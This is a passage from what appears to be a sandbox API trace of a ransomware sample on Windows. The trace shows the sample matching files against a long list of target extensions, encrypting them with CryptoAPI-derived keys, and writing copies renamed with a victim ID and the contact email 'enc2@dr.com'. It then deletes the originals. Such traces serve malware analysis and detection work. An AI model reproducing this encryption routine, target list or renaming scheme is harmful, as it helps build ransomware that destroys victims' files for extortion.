t.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0187.502] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.502] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.502] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0187.504] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xac5a, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0xac5a, lpOverlapped=0x0) returned 1
	[0187.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.508] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb880) returned 1
	[0187.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.512] CryptCreateHash (in: hProv=0xfcb880, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0187.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.512] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0187.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.513] CryptDeriveKey (in: hProv=0xfcb880, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9370) returned 1
	[0187.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.513] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0xac5a, dwBufLen=0xac5a | out: pbData=0x0*, pdwDataLen=0x18af1c*=0xac60) returned 1
	[0187.515] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.515] RtlMoveMemory (in: Destination=0xfe8420, Source=0xfdd180, Length=0xac5a | out: Destination=0xfe8420) 
	[0187.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.516] CryptEncrypt (in: hKey=0xfb9370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe8420*, pdwDataLen=0x18aefc*=0xac5a, dwBufLen=0xac60 | out: pbData=0xfe8420*, pdwDataLen=0x18aefc*=0xac60) returned 1
	[0187.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.516] CryptDestroyKey (hKey=0xfb9370) returned 1
	[0187.516] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.517] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0187.517] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.517] CryptReleaseContext (hProv=0xfcb880, dwFlags=0x0) returned 1
	[0187.517] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.517] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0187.518] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0187.518] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0187.519] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 115
	[0187.519] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0187.520] WriteFile (in: hFile=0x388, lpBuffer=0xfe8420*, nNumberOfBytesToWrite=0xac60, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe8420*, lpNumberOfBytesWritten=0x18b358*=0xac60, lpOverlapped=0x0) returned 1
	[0187.525] CloseHandle (hObject=0x388) returned 1
	[0187.525] CloseHandle (hObject=0x2c0) returned 1
	[0187.532] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx")) returned 1
	[0187.537] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\0ahak j1pizvk7bc.docx")) returned 0
	[0187.538] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ae3a730, ftCreationTime.dwHighDateTime=0x1d9741a, ftLastAccessTime.dwLowDateTime=0xe5d50480, ftLastAccessTime.dwHighDateTime=0x1d974ac, ftLastWriteTime.dwLowDateTime=0xe5d50480, ftLastWriteTime.dwHighDateTime=0x1d974ac, nFileSizeHigh=0x0, nFileSizeLow=0x12cf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="6ho5DpxNqP.ppt", cAlternateFileName="6HO5DP~1.PPT")) returned 1
	[0187.538] lstrcmpW (lpString1="6ho5DpxNqP.ppt", lpString2="..") returned 1
	[0187.538] lstrcmpW (lpString1="6ho5DpxNqP.ppt", lpString2=".") returned 1
	[0187.538] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0187.538] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="6ho5DpxNqP.ppt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\6ho5DpxNqP.ppt") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\6ho5DpxNqP.ppt"
	[0187.538] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\6ho5DpxNqP.ppt") returned 66
	[0187.538] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0187.539] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\6ho5DpxNqP.ppt", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt") returned 0x42
	[0187.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.539] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt", lpSrch="help_decrypt_your_files") returned 0x0
	[0187.539] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt"
	[0187.539] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt") returned 66
	[0187.539] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0187.539] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.540] StrStrW (lpFirst=".ppt", lpSrch=".") returned=".ppt"
	[0187.540] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0187.540] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ppt") returned=".ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0187.540] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0187.541] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0187.541] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\6ho5dpxnqp.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0187.547] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x12cf1, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x12cf1, lpOverlapped=0x0) returned 1
	[0187.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
